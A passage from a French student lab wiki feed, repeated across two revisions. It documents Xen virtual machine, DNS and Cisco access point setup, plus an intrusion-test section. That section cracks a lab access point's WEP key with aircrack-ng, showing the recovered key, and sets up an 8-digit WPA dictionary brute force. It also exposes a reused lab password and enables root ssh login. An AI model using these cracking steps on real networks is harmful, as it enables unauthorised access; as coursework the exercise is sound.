 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
'''Configuration DNS'''&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier /etc/bind/db.toad59.site&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56387</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56387"/>
				<updated>2021-11-19T08:44:24Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
'''Configuration DNS'''&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56386</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56386"/>
				<updated>2021-11-19T08:41:55Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Configuration DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
